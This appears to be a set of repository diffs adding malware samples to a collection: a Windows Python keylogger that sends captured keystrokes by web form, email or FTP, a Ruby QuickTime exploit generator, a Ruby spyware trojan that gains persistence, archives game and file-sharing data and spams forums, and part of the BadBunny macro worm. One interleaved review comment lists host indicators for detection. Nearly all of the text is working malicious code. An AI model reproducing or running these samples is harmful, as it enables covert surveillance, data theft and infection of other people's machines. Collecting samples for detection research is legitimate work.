+ import pythoncom, pyHook
+except:
+ print "Please Install pythoncom and pyHook modules"
+ exit(0)
+import os
+import sys
+import threading
+import urllib,urllib2
+import smtplib
+import ftplib
+import datetime,time
+import win32event, win32api, winerror
+
+#Disallowing Multiple Instance
+mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
+if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
+ mutex = None
+ print "Multiple Instance not Allowed"
+ exit(0)
+x=''
+data=''
+count=0
+
+#Hide Console
+def hide():
+ import win32console,win32gui
+ window = win32console.GetConsoleWindow()
+ win32gui.ShowWindow(window,0)
+ return True
+def msg():
+ print """Xenotix Python Keylogger for Windows
+Coder: Ajin Abraham <ajin25@gmail.com>
+OPENSECURITY.IN
+
+usage:xenotix_python_logger.py mode
+mode:
+ local: store the logs in a file [keylogs.txt]
+ remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
+ email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
+ ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
+ """
+ return True
+
+#Local Keylogger
+def local():
+ global data
+ if len(data)>100:
+ fp=open("keylogs.txt","a")
+ fp.write(data)
+ fp.close()
+ data=''
+ return True
+
+#Remote Google Form logs post
+def remote():
+ global data
+ if len(data)>100:
+ url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
+ klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
+ try:
+ dataenc=urllib.urlencode(klog)
+ req=urllib2.Request(url,dataenc)
+ response=urllib2.urlopen(req)
+ data=''
+ except Exception as e:
+ print e
+ return True
+
+#Email Logs
+class TimerClass(threading.Thread):
+ def __init__(self):
+ threading.Thread.__init__(self)
+ self.event = threading.Event()
+ def run(self):
+ while not self.event.is_set():
+ global data
+ if len(data)>100:
+ ts = datetime.datetime.now()
+ SERVER = "smtp.gmail.com" #Specify Server Here
+ PORT = 587 #Specify Port Here
+ USER="your_email@gmail.com"#Specify Username Here
+ PASS="password_here"#Specify Password Here
+ FROM = USER#From address is taken from username
+ TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
+ SUBJECT = "Keylogger data: "+str(ts)
+ MESSAGE = data
+ message = """\
+From: %s
+To: %s
+Subject: %s
+
+%s
+""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
+ try:
+ server = smtplib.SMTP()
+ server.connect(SERVER,PORT)
+ server.starttls()
+ server.login(USER,PASS)
+ server.sendmail(FROM, TO, message)
+ data=''
+ server.quit()
+ except Exception as e:
+ print e
+ self.event.wait(120)
+
+#Upload logs to FTP account
+def ftp():
+ global data,count
+ if len(data)>100:
+ count+=1
+ FILENAME="logs-"+str(count)+".txt"
+ fp=open(FILENAME,"a")
+ fp.write(data)
+ fp.close()
+ data=''
+ try:
+ SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
+ USERNAME="ftp_username" #Specify your FTP Username
+ PASSWORD="ftp_password" #Specify your FTP Password
+ SSL=0 #Set 1 for SSL and 0 for normal connection
+ OUTPUT_DIR="/" #Specify output directory here
+ if SSL==0:
+ ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
+ elif SSL==1:
+ ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
+ ft.cwd(OUTPUT_DIR)
+ fp=open(FILENAME,'rb')
+ cmd= 'STOR' +' '+FILENAME
+ ft.storbinary(cmd,fp)
+ ft.quit()
+ fp.close()
+ os.remove(FILENAME)
+ except Exception as e:
+ print e
+ return True
+
+def main():
+ global x
+ if len(sys.argv)==1:
+ msg()
+ exit(0)
+ else:
+ if sys.argv[1]=="local":
+ x=1
+ hide()
+ elif sys.argv[1]=="remote":
+ x=2
+ hide()
+ elif sys.argv[1]=="email":
+ hide()
+ email=TimerClass()
+ email.start()
+ elif sys.argv[1]=="ftp":
+ x=4
+ hide()
+ else:
+ msg()
+ exit(0)
+ return True
+main()
+
+def keypressed(event):
+ global x,data
+ if event.Ascii==13:
+ keys='<ENTER>'
+ elif event.Ascii==8:
+ keys='<BACK SPACE>'
+ elif event.Ascii==9:
+ keys='<TAB>'
+ else:
+ keys=chr(event.Ascii)
+ data=data+keys
+ if x==1:
+ local()
+ elif x==2:
+ remote()
+ elif x==4:
+ ftp()
+
+obj = pyHook.HookManager()
+obj.KeyDown = keypressed
+obj.HookKeyboard()
+pythoncom.PumpMessages()
\ No newline at end of file
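Review bot: The host indicators this sample leaves behind are all visible in the hunk but are not recorded anywhere in the commit: the named mutex `'mutex_var_xboz'` created by the `CreateMutex` call at startup, the local log file `keylogs.txt` written by `local()`, the `logs-<count>.txt` files staged by `ftp()` before upload, and the console window hidden by `hide()`. A short header comment or sidecar entry listing those would let corpus users write detections for the sample without executing it. Note also that the SMTP and FTP settings in `TimerClass.run` and `ftp()` (`your_email@gmail.com`, `password_here`, `ftp.xxxxxx.com`) and the Google Form URL in `remote()` are placeholders, so they should not be treated as live indicators when the sample is indexed.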
diff --git a/Ruby/Constructor.Ruby.Qtp.a b/Ruby/Constructor.Ruby.Qtp.a new file mode 100644 index 00000000..f2c1c175 --- /dev/null +++ b/Ruby/Constructor.Ruby.Qtp.a 
@@ -0,0 +1,61 @@ + +#!/usr/bin/ruby +# Copyright (c) LMH <lmh [at] info-pull.com> +# Kevin Finisterre <kf_lists [at] digitalmunition.com> +# +# Notes: +# Our command string is loaded on memory at a static address normally, +# but this depends on execution method and the string length. The address set in this exploit will +# be likely successful if we open the resulting QTL file directly, without having an +#ツinstance of Quicktime running. Although, when using another method and string, you'll need +# to find the address. +# For 100% reliable exploitation you can always use the /bin/sh address, +# but that's not as a cool as having your box welcoming the new year. +# Do whatever you prefer. That said, enjoy. +# +# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html + +# Command string: Use whatever you like. +# Remember that changing this will also need a change of the target address for system(), +# unless string length is the same. +CMD_STRING = "/usr/bin/say Happy new year shit bag" + +# Mac OS X 10.4.8 (8L2127) +EBP_ADDR = 0xdeadbabe +SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back +SETUID_ADDR = 0x900334f0 +CURL_ADDR = 0x916c24bc # /usr/bin/curl +SHELL_ADDR = 0x918bef3a # /bin/sh +CMDSTR_ADDR = [ + SHELL_ADDR, # 0 addr to static /bin/sh (lame) + 0x017a053c, # 1 addr to our command string (cool) :> (change as necessary) + 0xbabeface, # 2 bogus addr for testing. + CURL_ADDR # 3 addr to '/usr/bin/curl' + ] + +# Payload. default to CMDSTR_ADDR 0 (/bin/sh) +HAPPY = ("A" * 299) + + [EBP_ADDR].pack("V") + + [SYSTEM_ADDR].pack("V") + + [SETUID_ADDR].pack("V") + + [CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR) + +# Sleds: not necessary if using /bin/bash addr or other built-in addresses. 
+# although, for using our own fu, we need to spray some data for better reliability +# the goal is causing allocation of large heap chunks +NEW = ("\x90" * 30000) + CMD_STRING # feed the heap +YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go +APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more +BOYZ = ("\x90" * 30000) + "FOOM" # and more + +# QTL output template +QTL_CONTENT = "<?xml version=\"1.0\"?>" + + "<?quicktime type=\"application/x-quicktime-media-link\"?>" + + "<embed autoplay=\"true\" moviename=\"#{NEW}\" " + + "qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " + + "src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n" + +target_file = File.open("pwnage.qtl", "w+") { |f| + f.print(QTL_CONTENT) + f.close +} diff --git a/Ruby/Trojan-Spy.Ruby.Kakkeys.d b/Ruby/Trojan-Spy.Ruby.Kakkeys.d new file mode 100644 index 00000000..438d7b71 --- /dev/null +++ b/Ruby/Trojan-Spy.Ruby.Kakkeys.d 
@@ -0,0 +1,574 @@ +$KCODE = 's' +#$DEBUG = true +#Exerb = nil +require 'Win32API' +if ARGV.size == 1 and ARGV[0].include?('RoAddr') + $path = ARGV[0] + if File.exist?($path) + $rost = Win32API.new($path, 'RO_GetNowState', '', 'l') + $rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p') + $ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p') + $roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i') + $roin.call(0, '', 0x7FFFFFFF) + $rost.call + if $rost.call == 2 + print $ropa.call(258).to_s + "[#{$rowld.call}]" + end + end + exit +end +require 'win32/registry' +require 'ftools' +def dll(file) +if !File.exist?('C:/windows/system32/' + file) + f = Exerb.open(file) + f.binmode + open('C:/windows/system32/' + file, 'w'){|f2| + f2.binmode + f.read 9 + p f2.write(f.read) + } + f.close +end +end +if Exerb + if !Exerb.filepath.include?('iexplore') + File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe') + `start install.exe` + dll('zlib.dll') + dll('7-zip32.dll') + dll('imgctl.dll') + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + `start C:\\windows\\system32\\iexplore.exe` + exit + else +=begin + $double = Thread.new{ + cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l') + rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l') + ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l') + om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l') + gle = Win32API.new('kernel32', 'GetLastError', '', 'l') + + hage = cm.call(0, 0, 'hagemoe') + if gle.call == 183 + ch.call hage + hage = nil + hagege = cm.call(0, 0, 'hagegemoe') + if gle.call == 183 + ch.call hagege + exit 1 + end + elsif + 0 + end + if hage + s = 'hagegemoe' + else + s = 'hagemoe' + end + while(1) + a = om.call(1, 0, s) + if a == 0 + if ARGV[0] == 'aaa' + p system("start #{Exerb.filepath}") + else + p system("strat #{Exerb.filepath} 
aaa") + end + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } + sleep 0.1 + else + ch.call(a) + end + #p "sss" + sleep 0.04 + end + } +=end + end +end +if ARGV[0] == 'aaa' + sleep +end +END { + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key| + key.write_s('Shell', 'C:/windows/system32/iexplore.exe') + } +} +require 'kconv' +require 'web/agent' +require 'web/linkextor' + + +$wait_time = 1 +$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']] + +$category = '' +$bbs = '' + +$ropath = [] +$korepath = [] +$nypath = [] +$toolpath = [] +$charanames = [] +$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe'] +$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe'] +$kakikomi = [] +$id = '' +$charaarr = [] +$charas = '' +$tekito_id = '' +def Dir.copy(from, to, *jogai) + begin + sleep 0.01 + Dir.foreach(from){|x| + if !x.match(/^\.\.?/) + if File.directory?(from + x) + Dir.mkdir(to + x) + Dir.copy(from + x + '/', to + x + '/', *jogai) + else + if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0 + File.copy(from + x, to + x) + end + end + end 
+ } + rescue + return 1 + end + 0 +end +def delete_dir(dir) + begin + Dir.foreach(dir){|x| + if !x.match(/^\.\.?/) + if File.directory?(dir + x) + if Dir.entries(dir + x).size <= 2 + Dir.delete(dir + x) + else + delete_dir(dir + x + '/') + end + else + File.delete(dir + x) + end + end + } + Dir.delete(dir) + rescue + return 1 + end + 0 +end +def roname + abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb + return nil if abx.size == 0 + $charanames.push(abx) if !$charanames.include?(abx) + savedata($savefile) + abx +end +def emotion_wana wana + Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key| + for i in 0..9 + key.write_s(i.to_s, wana) + end + } +end +def upfolder(folder, trip) + Dir.mkdir(folder) if !File.exist?(folder) + begin + $nypath.each{|x| + File.chmod(0777, x + '/upfolder.txt') + open(x + '/UpFolder.txt', 'a+'){|f| + f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン') + } + } + rescue + end + folder +end +def saiki dir + sleep 0.01 + begin + Dir.chdir(dir){ + #print Dir.pwd + "\n" + $ropath.push Dir.pwd if File.exist?($tar[0]) + $korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1]) + sleep 0.01 + $nypath.push Dir.pwd if File.exist?($tar[2]) + $kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt') + $toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0 + Dir.foreach('./'){ |x| + if File.directory?(x) && !x.match(/\.\.?/) + saiki(x) + end + } + } + rescue + p $! + ensure + end +end +def search + get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l') + + for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('') + if get_drv_type.call(drive + ':/') == 3 + saiki(drive + ':/') + end + end + $ropath.uniq! + $toolpath.uniq! + $korepath.uniq! + $nypath.uniq! 
+end +def savedata(path) + open(path, 'w'){|f| + Marshal.dump($ropath, f) + Marshal.dump($korepath, f) + Marshal.dump($nypath, f) + Marshal.dump($toolpath, f) + Marshal.dump($kakikomi, f) + Marshal.dump($bbs_arr, f) + Marshal.dump($charanames, f) + Marshal.dump($tekito_id, f) + } + true +end +def loaddata(path) + return false if !File.exists?(path) + open(path){|f| + $ropath = Marshal.load(f) + $korepath = Marshal.load(f) + $nypath = Marshal.load(f) + $toolpath = Marshal.load(f) + $kakikomi = Marshal.load(f) + $bbs_arr = Marshal.load(f) + $charanames = Marshal.load(f) + $tekito_id = Marshal.load(f) + } + true +end +def rns *str + if str.size == 1 + str = str[0].split('') + end + str[rand(str.size)] +end +def names +begin +$charaarr = [] +$charas = '' +separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words) +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list| + wisp_list.each_key{|server_str, sute| + $charas += server_str + "\n" + wisp_list.open(server_str){|server| + server.each_key{|char_str, sute| + $charaarr.push char_str.split("\0")[0] + } + } + $charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n" + $charaarr = [] + } +} +Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]} +rescue + p $1 +end +end +names + +$upup = upfolder('C:\program files\daemontools\\', '') +$capture = Proc.new{ + loop do + getDC = Win32API.new('user32', 'GetDC', 'l', 'l') + releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l') + dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l') + dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i') + deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i') + begin + akakaka = roname + hdc = getDC.call(0) + hdib = dc2dib.call(hdc,0,0,0,0) + 
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' 「'+$charanames.join('」「')+'」.png', hdib, 0) + File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0) + ensure + deleteDib.call(hdib) + releaceDC.call(0, hdc) + end + if akakaka + jikan = Time.now + if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18 + emotion_wana "やあ僕BOTer!#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!" + sleep 5 * 60 + else + sleep 12 * 60 + end + else + begin + open('c:/program files/internet explorer/iexplore.exe', 'a'){} + sleep 20 * 60 + rescue + sleep 15 * 60 + end + end + end +} +#init +$savefile = 'C:/RECYCLER/explorer.sys' +if !loaddata($savefile) + Thread.new(&$capture) + search + savedata($savefile) +else + Thread.new(&$capture) +end +if $tekito_id.size == 0 + $tekito_id = $id +end +#p $ropath, $korepath, $nypath, $toolpath, $charanames +if Dir.glob('C:/program files/daemontools/*.zip').size == 0 +begin + tmpf = 'C:/RECYCLER/tmp/' + Dir.mkdir(tmpf) if !File.exist?(tmpf) + $toolpath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'txt') + } + $korepath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', 'fld') + } + $ropath.each{|x| + to = tmpf + x.gsub(/\/|:/, '_') + if File.exist?(to);to = to + '_';end + Dir.mkdir(to) + Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld') + } + $nypath.each_with_index{|x, i| + if i == 0 + to = tmpf + 'winny' + else + to = tmpf + 'winny' + i.to_s + end + Dir.mkdir(to) if !File.exist?(to) + File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt') + File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt') + File.copy(x 
+ '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt') + } + $kakikomi.each{|x| + File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x) + } + seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i') + str = 'aaaaa' + + seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5) +rescue + p $! + print $!.backtrace.join("\n") +ensure + delete_dir tmpf +end +end +#exit + +$path = $ropath[0] + '/' + +$roaddr = File.exist?($path + 'roaddr.dll') +$ro = File.exist?($path + 'ragexe.exe') +$are = File.exist?($path + 'ws2_32.dll') +$rtx = File.exist?($path + 'ddraw.dll') +def rtx + rns(rns('rRrR'), rns('あアア') + rns('ー−‐-あアア') + rns('るルル')) + + rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー−‐-')) + + rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス')) +end + +def aretool + rns(rns('aAaA'), rns('あアア')) + + rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) + + rns(rns('tTtT') + rns('oOoO00'), rns('つツツ')) + + rns(rns('oOoO00'), rns('うウウー−‐-')) + + rns(rns('lLlL'), rns('るルル')) +end +$nypath.each{|x| + if File.exist?(x + '/Tab1.txt') + open(x + '/Tab1.txt'){|f| + $omosiro_words = f.read.split("\n") + } + end +} + +def getThreads + http = Web::Agent.new + http.setup + http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3" + $category, $bbs = *$bbs_arr[rand($bbs_arr.size)] + http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt") + $suret = http.rsp.body.split("\n") + sss = [] + $suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + return sss; +end +#p '書き込み開始' + +agent = Web::Agent.new +agent.setup +agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3" +agent.get('http://www.cybersyndrome.net/pla.html') +agent.rsp.body.match("") +proxy = [] 
+while($'.match(/\"A\">([^<>]*)<\/a>/)) #' + proxy.push($~[1]) +end +proxy.delete_if{|pr| + pr.match(/(80)|(8080)/) +} +proxy.collect! do |i| + i.split(':') +end + +count = 0 +while(1) + sure = getThreads; + if rand(6) == 0 + for ituuu in 0..9 + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.get 'http://yy14.kakiko.com/landstriker/subject.txt' + suret = age.rsp.body.split("\n") + sss = [] + suret.each{|sure| + if !sure.match(/.*\(10000?\)/) + sure.match(/^(\d+)/) + sss.push $1 + end + } + Thread.new{ + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/" + age.req.header['content-type']='application/x-www-form-urlencoded' + ran = rand(proxy.size) + if rand(2) == 1 + age.proxy_host = proxy[ran][0] + age.proxy_port = proxy[ran][1] + end + if sss.size != 0 + if $id == '' + age.req.form.add 'FROM', (10000 + rand(90000)).to_s + age.req.form.add 'mail', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + else + names + age.req.form.add 'FROM', $id + age.req.form.add 'mail', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'bbs', 'landstriker' + age.req.form.add 'key', sure[rand(sure.size)] + age.req.form.add 'time', Time.now.to_i.to_s + age.req.form.add 'submit', '書き込む' + age.post('http://yy14.kakiko.com/test.bbs.cgi') + else + 
suret[rand(suret.size)].match(/,(.+)\(/) + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'FROM', '' + age.req.form.add 'mail', '' + age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words) + age.req.form.add 'bbs', $bbs + age.req.form.add 'time', Time.now.to_s.toi + age.req.form.add 'submit', '新規スレッド作成' + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + } + end + else + if sure.size != 0 + loop do + sleep $wait_time + r = rand proxy.size + Thread.new(r, proxy){|ran, pro| + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + if rand(2) == 1 + age.proxy_host = pro[ran][0] + age.proxy_port = pro[ran][1] + end + if $id == '' + age.req.form.add 'NAME', (10000 + rand(90000)).to_s + age.req.form.add 'MAIL', 'sage' + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + else + names + age.req.form.add 'NAME', $id.chop.chop + age.req.form.add 'MAIL', '' + massage = '' + massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1 + massage += rtx + "\n" if $rtx + massage += aretool + "\n" if $are + massage += "RoAddr\n" if $roaddr && rand(2) == 1 + massage += "KORE\n" if $korepath.size > 0 + massage += $charas + age.req.form.add 'MESSAGE', massage + end + age.req.form.add 'BBS', 
$bbs + age.req.form.add 'KEY', sure[rand(sure.size)] + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + } + count += 1 + break if count % 10 == 0 + end + else + $suret[rand($suret.size)].match(/,(.+)\(/) + age = Web::Agent.new + age.setup + age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8" + age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/" + age.req.header['content-type']='application/x-www-form-urlencoded' + age.req.form.add 'NAME', '' + age.req.form.add 'MAIL', '' + age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s + age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ') + age.req.form.add 'BBS', $bbs + age.req.form.add 'TIME', Time.now.to_s.to_i + age.req.form.add 'DIR', $category + age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}") + end + end +end + +while Thread.list.size > 2 + sleep 10 +end diff --git a/Ruby/Virus.Ruby.Badbunny.a b/Ruby/Virus.Ruby.Badbunny.a new file mode 100644 index 00000000..05429dee --- /dev/null +++ b/Ruby/Virus.Ruby.Badbunny.a 
@@ -0,0 +1,314 @@
+Dim Url As String
+Dim myFileProp as Object
+
+Sub badbunny()
+rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
+Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
+mEventProps(0).Name = "EventType"
+mEventProps(0).Value = "StarBasic"
+mEventProps(1).Name = "Script"
+mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+oDocument = ThisComponent
+otext=oDocument.text
+ocursor=otext.createtextcursor()
+otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
+url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
+oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
+msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
+call ping
+end sub
+
+sub startgame
+if GetGUIType =1 then 'windows
+call win
+end if
+if GetGUIType =3 then 'MacOS
+call mac
+end if
+if GetGUIType =4 then 'linux
+call lin
+end if
+end sub
+
+sub win
+Dim dirz As String
+Dim dummy()
+Dim iVar As Integer
+Dim Args(0) as new com.sun.star.beans.PropertyValue
+Args(0).Name = "MacroExecutionMode"
+Args(0).Value = _
+com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
+ThisComponent.LockControllers
+ datei="c:\badbunny.odg"
+ dateiurl=converttourl(datei)
+ odoc=thisComponent
+ odoc.storeasurl(dateiurl,dummy())
+dirz=Environ ("programfiles")
+
+Open "c:\drop.bad" For Output As #1
+Print #1, "[script]"
+Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
+Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... 
)*#*#*#*#*#*#*"
+Print #1, "n2=on 1:start:{"
+Print #1, "n3= /if $day == Friday { /echo }"
+Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
+Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
+Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
+Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
+Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
+Print #1, "n9=on 1:part:#:{"
+Print #1, "n10=set %M_E $me"
+Print #1, "n11=set %NickName $nick"
+Print #1, "n12=set %ccd .dcc"
+Print #1, "n13= if %NickName != %M_E {"
